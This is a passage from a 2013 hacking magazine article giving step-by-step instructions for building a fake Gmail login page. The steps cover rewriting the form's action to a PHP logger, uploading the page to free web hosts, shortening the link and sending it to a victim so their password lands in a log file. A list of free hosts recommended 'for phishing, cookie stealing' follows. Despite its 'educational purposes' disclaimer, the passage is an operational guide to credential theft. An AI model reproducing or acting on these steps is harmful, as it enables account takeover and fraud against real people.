the fake webpage will log his E-mail ID and
password. After that he will automatically be
redirected to the original webpage making him
unsuspicious of what has just happened. This is
used for criminal activities for stealing Credits
Cards ect. That is the exact reason why I DO NOT
want you to use this for fraud. Use this only for
the educational purposes and not to cause any
damage to any person in any way.
Phishing is the most popular and widely used
method for hacking email accounts and it is not
as easy as its name. Creating a phishing page is an
easy task and anyone can download it from
various hacking forums for free. The main step of
phishing comes after creation of fake login page.
Figure 19: Phishing Method.
How to create your own phishing
page
1. Copy the script above and open it as
log.php or login.php
2. Now open gmail home page with you
want to create.
3. I'm creating gmail phishing login page!!
Figure 20: Creating home page of Gmail Fake
Page.
4. RIGHT CLICK > save as save the script with
the name index.HTML like in the image
Figure 21: Saving Gmail fake page with name index.html.
24th of January 2013
01/2012
35
5. Now open it with notepad find "action" word for that you can use CTRL + F now delete the
action=https://accounts.google.com/ServiceLoginAuth and use login.php? in the place of the
link save your script
Figure 22: Save fake gmail page’s source with name login.php.
NOW YOUR LOGIN.PHP AND INDEX.HTML PAGES ARE READY!
6. Your page is ready for uploading.
7. Create an account on free webhosting sites just like (WWW.MY3GB.COM) or (WWW.5GB.COM)
Figure 23: Create an account on webhosting site like www.my3gb.com.
Upload your phishing page on your webhosting page. You should receive something like that:
Figure 24: Upload fake page and php script on webhosting site.
AFTER UPLOADING IT Now shorten the URL of the INDEX.HTML
(NAME.MY3GB.COM/INDEX.HTML) in Google URL
for everytime.
Next send the link (GOO.GL____) to victim make
your victim to login or send your fake URL of FB
login to your victim e-mail.
Once your victim is logged in your fake page JUST
RECIEVE PASSWORD IN LOG.TXT
Figure 25: Credential hacking.
Here are some suggested free web
hosting websites
For phishing, cookie stealing and
other hacking purposes you need a help from the
web hosting sites. These address will help you a
lot. Choose your favorite one and sign up, all of
them are for free.
1. 110mb - http://110mb.com
2. Ripway - http://ripway.com
3. SuperFreeHost - http://superfreehost.info
4. Freehostia - http://freehostia.com
5. Freeweb7 - http://freeweb7.com
6. t35 - http://t35.com
7. Awardspace - http://awardspace.com
8. PHPNet - http://phpnet.us
24th of January 2013
01/2012
37
About the author
Thank you for reading our
magazine from cover to cover.
Please share with us your
comment about this issue on
Twitter:
@Hackinsight
or Facebook:
http://www.facebook.com
/hackinsight
The techniques described in our articles
may only be used in private, local
networks.The editors hold no
responsibility for misuse of the presented
techniques or consequent data loss.
9. Free Web Hosting Pro -
http://freewebhostingpro.com
10. ProHosts - http://prohosts.org
11. FreeZoka - http://www.freezoka.com/
12. 000webhost - http://000webhost.com/
13. AtSpace - http://atspace.com
14. My3gb - http://my3gb.com
15. Zymic - http://zymic.com
VIKAS KUMAR (ISHAN) is one of the leading computer security experts available in India. VIKAS KUMAR born on 26 July 1990 in a town called Meerut, UP (India). VIKAS KUMAR started his Group “hackers4u” on Facebook in year 2010
and in two years he bangs the World Wide Web with good computer ethical hacking articles and going to launch the website on Cyber Security & Ethical Hacking and working with a Anti-Hacking Community “I-hackers4u”. The 22 year old guy have the capability to compete with the people best in the business so called” Ethical Hacking”. Workshops and Seminars: VIKAS KUMAR have trained more than 3000 people from all around the world, from countries like India, Dubai, Sudan, United Kingdom, Thailand, Nigeria, Shri Lanka, Kenya, Australia, Kazakhstan, Canada, Ghana, United States, South Africa, China, Malaysia, Singapore, Omen, Yemen, Indonesia, Korea, Iran and etc.
Become our Beta
Tester and receive
each article before
publication date!
